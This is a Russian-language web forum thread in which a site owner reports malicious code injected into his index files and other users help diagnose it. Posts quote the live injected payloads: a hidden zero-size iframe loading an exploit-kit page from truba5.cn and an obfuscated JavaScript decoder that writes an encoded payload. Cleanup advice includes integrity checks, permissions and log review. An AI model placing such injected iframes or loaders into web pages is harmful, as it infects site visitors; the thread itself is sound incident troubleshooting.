![]() |
Вредоносный код на сайте!!!
Добрый день, дорогие форумчане! :)
Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал: Код HTML:
<script language="javascript">Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты. В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое. Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало. Прошу вашей помощи, помогите разобраться, что, к чему. :confused: Спасибо! |
напиши УРЛ сайта, все из базы удалят :)
|
Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один
|
Код:
<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe> |
Пару троев грохнул! Пасы сменил.
|
Может в каком-нить файле шелл просто?
|
Tigger, можиет, но как узнать?
|
Проверяй каждый файл на наличие вредоносного кода.
|
Цитата:
|
То что это шелл - врятли...
Это скорее троянчик... причем недавно сделаннный... Код:
<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>Код:
http://www.virustotal.com/ru/analisis/0f51e07788d3f945d6b94b83c03d83c136a287ad9545c07ae58aa1d152fa8c1b-1245078728Когда открыл сайт подумал вначале, что хрень какая-та (PDF документа как такогого там нет, просто грузится плагин PDF Reader'a в опере)... Так бы наверное он у меня и висел (ну всмысле вирусяка), если бы винда не выдала НЕ ОТПРАВЛЯТЬ по истечению какого-то времени :) P.S. Так бы подумал что просто типо счетчик.... Кому-то надо посетителей нагонять, а здесь оказывается все круче =)) |
Цитата:
|
Цитата:
|
ну допустим почитай тут
http://www.securitylab.ru/vulnerability/362445.php |
http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144 |
Цитата:
Цитата:
|
Много связок грузятся через яваскрипт, неужели трудна разработчикам браузеров проконтролировать действия яваскрипта? Я видел как исхещряюца с кодом чтобы обмануть браузер,но все же... По поводу pdf, интересная идея, грузить троя через дыру в плагине.. Фантазии нет придела!
А чтобы не вычищать каждый день ифрэймы и яваскрипты, то надо хранить на балванке копию сайта и если какието произошли изменения, то файлики обновить и все, просто если сайт большой, замаешься чистить. А еще хорошо спрятанный шелл хрен найдешь. |
Цитата:
|
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
|
Цитата:
|
Блин, сегодня захожу, там уже другая ***ня:
Код HTML:
<script language="javascript">function _lUPNLpHJVX7T3P( _lXm9tW7QM2MwHU ){var _lxQthEExSQdZZz = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";var _lxXJqmgSlQpjg1 = '';var _lbtojDbzx931xM = 18;var _lHQlhGZ4PFhvYJ = 0;for ( var _lBDsi5JRjsUAiH = 0; _lBDsi5JRjsUAiH < _lXm9tW7QM2MwHU.length; _lBDsi5JRjsUAiH++ ) { var _l9b9wnGDPoJpiY = _lxQthEExSQdZZz.indexOf( _lXm9tW7QM2MwHU.charAt( _lBDsi5JRjsUAiH ) ); if ( _lbtojDbzx931xM == 0 ) { _lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY; var _luGKJPMN7vIHCr = ( _lHQlhGZ4PFhvYJ & 0xFF0000 ) >> 16;if ( _luGKJPMN7vIHCr != 0 ) {_lxXJqmgSlQpjg1 += String.fromCharCode( _luGKJPMN7vIHCr );}var _l0XsYfs0eeeliu = ( _lHQlhGZ4PFhvYJ & 0xFF00 ) >> 8;if ( _l0XsYfs0eeeliu != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _l0XsYfs0eeeliu );}var _lPrZyGK4RUKehH = _lHQlhGZ4PFhvYJ & 0xFF;if ( _lPrZyGK4RUKehH != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _lPrZyGK4RUKehH );}_lHQlhGZ4PFhvYJ = 0;_lbtojDbzx931xM = 18;} else {_l9b9wnGDPoJpiY = _l9b9wnGDPoJpiY << _lbtojDbzx931xM;_lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY;_lbtojDbzx931xM -= 6;}}return _lxXJqmgSlQpjg1;} document.write( _lUPNLpHJVX7T3P( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOaXGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );</script> |
Цитата:
Цитата:
если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл. |
Цитата:
Твой код соответствует этому: Код:
<script language="javascript">Цитата:
Цитата:
А че шелл?.. Если это и шелл (хотя маловероятно), то шелл ТС и сам может найти... Весь PHP-код на сайте посмотри. Там что-то "инородное" сразу, в принципе, невооруженным глазом видно :) |
Спасибо, полез искать заразу :(
|
сервер на никсах?
смотри тщательно процессы. Все эти дела может запускать простенький скрипт, фопеном грузить откуда-то то, что надо и все..раз в час или в другой промежуток времени. вобще выставь r-r-r на индекс.пхп, а еще лучше човни индекс другим юзером)) и права на запись потом уже убери.корень не забудь тоже. |
$n@ke, спасибо, поменяю права сейчас! :)
Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь: news127.inc больше метра весит :) |
Цитата:
Кстати он там и делался... :) Шелл это, допустим, вот так: Код:
<?php Цитата:
|
а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?
проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно |
Цитата:
<?php echo "Всё зае*ись! Шелов не обнаружено"; ?> ;) Поэтому удалять его нужно с сервера до следующей проверки :) |
Цитата:
Обращаться нет смысла, как всегда скажут смотрите свой комп. Др сайты на этом хосте норм! :) |
Цитата:
PHP код:
|
Интерестно,а можно выложить такой код?т.е. что-бы сделать страничку с вирей?
|
Как я понял, ифрейм добавляется с переодичностью, поиск идет по index.php, indeh.html, index.htm и так далее. И на сколько мне известно (или в апаче или где, сам не спец) можно делать, чтоб при заходе на site.com мы заходили не на site.com/index.php, а например, site.com/tratata.php. Это, конечно, только, чтоб не было ифреймов, а было время спокойно поискать что откуда
|
| Время: 01:20 |